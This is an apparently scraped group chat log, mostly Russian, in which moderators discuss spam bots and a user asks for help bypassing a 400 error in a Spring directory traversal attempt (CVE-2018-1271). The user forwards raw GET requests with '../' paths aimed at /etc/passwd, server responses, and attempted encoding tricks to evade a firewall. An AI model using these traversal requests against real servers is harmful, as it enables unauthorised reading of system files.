S
Убрал одного бота
Привет Ame!
Читай правила, жми кнопочку
Size: a a a
2018 September 16
2018 September 17
A
Привет Ardys!
Читай правила, жми кнопочку
Читай правила, жми кнопочку
A
Привет Gavrielle!
Читай правила, жми кнопочку
Читай правила, жми кнопочку
B
Так если не кликают, кнопки так и будут висеть? Негоже
p
А что эти боты вообще делают?
B
А что эти боты вообще делают?
Пока спят. Когда навступают в кучу групп до лимита - проспамят все одновременно и их заблочаи
K
Пока спят. Когда навступают в кучу групп до лимита - проспамят все одновременно и их заблочаи
Будет BoOoM
C
Так если не кликают, кнопки так и будут висеть? Негоже
Пофиксю сегодня
NK
Hi, what can you advice for bypass HTTP 400 Bad Request respinse in directory traversal ?
B
ID:424939316
Hi, what can you advice for bypass HTTP 400 Bad Request respinse in directory traversal ?
Do not try to leave the www directory :)
NK
Переслано от ID:424939316
this is directory traversal in Spring framework CVE-2018-1271
NK
Переслано от ID:424939316
GET /portal/resources/static/../../../etc/passwd HTTP/1.1
Host: aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Host: aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
NK
Переслано от ID:424939316
response HTTP/1.1 404 Not Found
Date: Mon, 17 Sep 2018 06:18:17 GMT
Server: Apache/2.2.12 (Linux/SUSE)
Content-Length: 971
Connection: close
Content-Type: text/html;charset=utf-8
Date: Mon, 17 Sep 2018 06:18:17 GMT
Server: Apache/2.2.12 (Linux/SUSE)
Content-Length: 971
Connection: close
Content-Type: text/html;charset=utf-8
NK
NK
Переслано от ID:424939316
GET /portal/resources/static/../../../../etc/passwd HTTP/1.1
Host: aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Host: aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
NK
NK
Переслано от ID:424939316
HTTP/1.1 400 Bad Request
Date: Mon, 17 Sep 2018 06:20:58 GMT
Server: Apache/2.2.12 (Linux/SUSE)
Content-Length: 436
Connection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 17 Sep 2018 06:20:58 GMT
Server: Apache/2.2.12 (Linux/SUSE)
Content-Length: 436
Connection: close
Content-Type: text/html; charset=iso-8859-1
NK
Переслано от ID:424939316
i'm thin there is waf, but i test to bypass %5c and %2f it dosen't help me (
B